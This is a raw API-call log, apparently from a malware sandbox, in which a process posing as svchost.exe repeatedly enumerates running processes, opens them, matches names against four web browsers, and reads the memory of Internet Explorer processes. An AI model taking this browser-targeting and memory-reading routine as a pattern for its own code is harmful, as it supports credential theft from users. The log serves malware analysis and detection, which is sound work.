	[0194.952] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0194.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.952] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.952] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0194.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.952] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0194.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xe14
	[0194.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.953] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0194.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.954] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.954] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0194.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.955] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.955] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0194.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xe18
	[0194.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.956] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0194.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.957] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.957] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0194.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.958] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0194.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xe1c
	[0194.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.959] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0194.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.959] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.960] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0194.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.960] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.961] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0194.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xe20
	[0194.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.961] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0194.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.962] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.963] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0194.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.963] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0194.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xe24
	[0194.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.964] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0194.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.965] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.965] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0194.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.966] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xe28
	[0194.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.967] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.967] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.967] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.968] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.968] NtQueryInformationProcess (in: ProcessHandle=0xe28, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.968] ReadProcessMemory (in: hProcess=0xe28, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.969] ReadProcessMemory (in: hProcess=0xe28, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.969] ReadProcessMemory (in: hProcess=0xe28, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.969] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xe2c
	[0194.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.974] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.974] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.975] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.975] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.975] NtQueryInformationProcess (in: ProcessHandle=0xe2c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.975] ReadProcessMemory (in: hProcess=0xe2c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.975] ReadProcessMemory (in: hProcess=0xe2c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.975] ReadProcessMemory (in: hProcess=0xe2c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.975] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xe30
	[0194.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.976] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.977] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.977] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.977] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.978] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0194.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xe34
	[0194.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.978] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0194.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.979] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.979] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0194.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.979] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xe38
	[0194.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.980] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.981] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.981] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.981] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0194.983] CloseHandle (hObject=0x188) returned 1
	[0194.983] Sleep (dwMilliseconds=0x64) 
	[0195.094] GetCurrentProcessId () returned 0x110
	[0195.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0195.096] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0195.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0195.097] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0195.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xe3c
	[0195.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.098] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.098] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.099] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.099] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xe40
	[0195.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.100] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.100] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.101] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.101] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0195.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xe44
	[0195.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.102] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0195.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.102] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.103] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0195.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.103] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xe48
	[0195.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.104] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.104] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.104] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.105] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0195.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xe4c
	[0195.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.106] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0195.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.106] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.106] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0195.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.107] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0195.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xe50
	[0195.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.108] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0195.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.108] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.109] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0195.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.158] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0195.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xe54
	[0195.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.160] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0195.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.160] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.161] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0195.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.161] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.162] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0195.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xe58
	[0195.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.163] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.164] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.164] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.164] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xe5c
	[0195.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.166] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.166] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.167] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.168] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.168] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xe60
	[0195.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.169] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.170] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.170] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.171] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.171] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xe64
	[0195.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.172] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.173] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.173] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.173] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
